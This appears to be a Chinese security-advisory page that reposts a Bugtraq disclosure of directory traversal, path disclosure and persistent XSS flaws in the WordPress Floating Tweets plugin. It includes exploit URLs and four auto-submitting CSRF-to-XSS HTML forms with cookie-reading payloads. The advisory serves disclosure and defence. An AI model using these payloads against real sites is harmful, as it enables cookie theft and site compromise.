Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / WordPress Floating Tweets插件目录遍历和HTML注入漏洞

发布日期:2013-01-12
更新日期:2013-01-16受影响系统:
WordPress Floating Tweets
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57302
 
WordPress Floating Tweets 可快速添加浮动工具集,显示任一twitter源的最新tweet。
 
Floating Tweets 1.0.1及其他版本在实现上存在目录遍历和多个HTML注入漏洞,攻击者可利用这些漏洞访问服务器进程上下文内的任意文件,在受影响浏览器中执行HTML和脚本代码。
 
<*来源:MustLive (mustlive@websecurity.com.ua)
 
 链接:http://packetstormsecurity.com/files/119499/floatingtweets-xsstraversal.txt
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Full path disclosure (WASC-13):
 
http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets.php
 
http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets_widget.php
 
http://site/wp-content/plugins/floating-tweets/skin.php?skin=1
 
Directory Traversal (Windows) (WASC-33):
 
http://site/wp-content/plugins/floating-tweets/skin.php?widget_id=2&skin=11
 
DT allows to read only css-files (in folder /skins/ and subfolders). At
turned off mq it"s possible to use Null Byte Injection, which allows via DT
to read arbitrary files.
 
XSS (persistent XSS) (WASC-08):
 
Three persistent XSS holes. For attack it"s needed to bypass protection
against CSRF (parameter savewidgets). E.g. using reflected XSS.
 
Floating Tweets XSS.html
 
<body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/wp-admin/admin-ajax.php"
method="post">
 <input type="hidden" name="widget-dc_jqfloatingtweets_widget[3][twitterUrl]"
value="" style="xss:expression(alert(document.cookie))">
 <input type="hidden" name="widget-id" value="dc_jqfloatingtweets_widget-3">
 <input type="hidden" name="id_base" value="dc_jqfloatingtweets_widget">
 <input type="hidden" name="action" value="save-widget">
 <input type="hidden" name="savewidgets" value="e8af3131f4">
 <input type="hidden" name="sidebar" value="primary-widget-area">
 </form>
 </body>
 
Floating Tweets XSS-2.html
 
<body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/wp-admin/admin-ajax.php"
method="post">
 <input type="hidden" name="widget-dc_jqfloatingtweets_widget[3][linkText]"
value="" style="xss:expression(alert(document.cookie))">
 <input type="hidden" name="widget-id" value="dc_jqfloatingtweets_widget-3">
 <input type="hidden" name="id_base" value="dc_jqfloatingtweets_widget">
 <input type="hidden" name="action" value="save-widget">
 <input type="hidden" name="savewidgets" value="e8af3131f4">
 <input type="hidden" name="sidebar" value="primary-widget-area">
 </form>
 </body>
 
Floating Tweets XSS-3.html
 
<body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/wp-admin/admin-ajax.php"
method="post">
 <input type="hidden" name="widget-dc_jqfloatingtweets_widget[3][tabText]"
value="" style="xss:expression(alert(document.cookie))">
 <input type="hidden" name="widget-id" value="dc_jqfloatingtweets_widget-3">
 <input type="hidden" name="id_base" value="dc_jqfloatingtweets_widget">
 <input type="hidden" name="action" value="save-widget">
 <input type="hidden" name="savewidgets" value="e8af3131f4">
 <input type="hidden" name="sidebar" value="primary-widget-area">
 </form>
 </body>
 
Examples of attack for these three XSS on IE7 and previous versions. With
using of MouseOverJacking it"s possible to attack any browsers. The code
will execute right away at sending request and further at visiting
http://site/wp-admin/widgets.php.
 
Floating Tweets XSS-4.html
 
<body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/wp-admin/admin-ajax.php"
method="post">
 <input type="hidden" name="widget-dc_jqfloatingtweets_widget[3][tabText]"
value=""});alert(document.cookie);a({b:"">
 <input type="hidden" name="widget-id" value="dc_jqfloatingtweets_widget-3">
 <input type="hidden" name="id_base" value="dc_jqfloatingtweets_widget">
 <input type="hidden" name="action" value="save-widget">
 <input type="hidden" name="savewidgets" value="e8af3131f4">
 <input type="hidden" name="sidebar" value="primary-widget-area">
 </form>
 </body>建议:
--------------------------------------------------------------------------------
厂商补丁:
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://wordpress.org/Microsoft Lync "User-Agent"跨站脚本执行漏洞BackupPC "RestoreFile.pm"跨站脚本执行漏洞相关资讯      WordPress安全漏洞 
  • Wordpress Lazy SEO插件Shell上传  (09/23/2013 18:12:26)
  • WordPress crypt_private()远程拒  (06/30/2013 06:24:06)
  • WordPress ProPlayer 插件"id"参数  (05/23/2013 20:13:32)
  • WordPress HMS Testimonials 2.0.  (08/10/2013 14:28:41)
  • WordPress Image Slider with   (05/29/2013 19:27:42)
  • WordPress WP Cleanfix 插件"  (05/21/2013 19:36:23)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图